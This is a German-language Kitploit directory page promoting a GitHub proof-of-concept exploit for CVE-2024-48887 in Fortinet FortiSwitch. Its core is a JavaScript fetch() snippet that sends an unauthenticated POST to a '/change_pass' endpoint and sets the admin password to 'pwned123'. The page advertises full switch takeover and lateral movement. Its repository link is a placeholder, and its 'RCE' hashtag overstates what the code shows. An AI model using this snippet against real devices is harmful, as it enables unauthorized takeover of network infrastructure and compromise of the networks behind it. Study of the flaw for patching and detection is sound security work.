Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-48887-FortiSwitch-Exploit — ein leichtgewichtiges JavaScript-Snippet, das zeigt, wie unberechtigte Passwortänderungen auf anfälligen Fortinet FortiSwitch GUI-Endpunkten ausgelöst werden können. | Kitploit
Tools/GitHubGitHub/cybersecplayground/cve-2024-48887-fortiswitch-exploit
SchwachstellenanalyseExploitationLaterale BewegungWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubcybersecplayground/cve-2024-48887-fortiswitch-exploit

CVE-2024-48887-FortiSwitch-Exploit

ein leichtgewichtiges JavaScript-Snippet, das zeigt, wie unberechtigte Passwortänderungen auf anfälligen Fortinet FortiSwitch GUI-Endpunkten ausgelöst werden können.

Repository anzeigen
23vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-48887-FortiSwitch-Exploit

🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨

🔥 Gerade ein leichtgewichtiges JavaScript-Snippet veröffentlicht, das zeigt, wie unbefugte Passwortänderungen auf anfälligen Fortinet FortiSwitch GUI-Endpunkten ausgelöst werden können.

🛠️ Über die Schwachstelle: Ein Angreifer kann eine einfache fetch()-Anfrage erstellen, um Passworteinstellungen ohne Authentifizierung zu manipulieren, indem er direkt auf /change_pass-Endpunktvarianten abzielt.

root@kitploit:~
fetch('http://target-ip/change_pass', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    username: 'admin',
    newpass: 'pwned123',
    confirm: 'pwned123'
  })
})
.then(res => res.text())
.then(data => console.log('Response:', data));

💡 Auswirkungen: Vollständige Switch-Übernahme, Potenzial für laterale Bewegung und Netzwerkkompromittierung.

📁 Repo: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ Gib dem Repo einen Stern und teile es mit deinen Infosec-Kollegen!

📢 Folge der vollständigen Analyse und den Echtzeit-Warnungen über @cybersecplayground

#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground

Tool herunterladen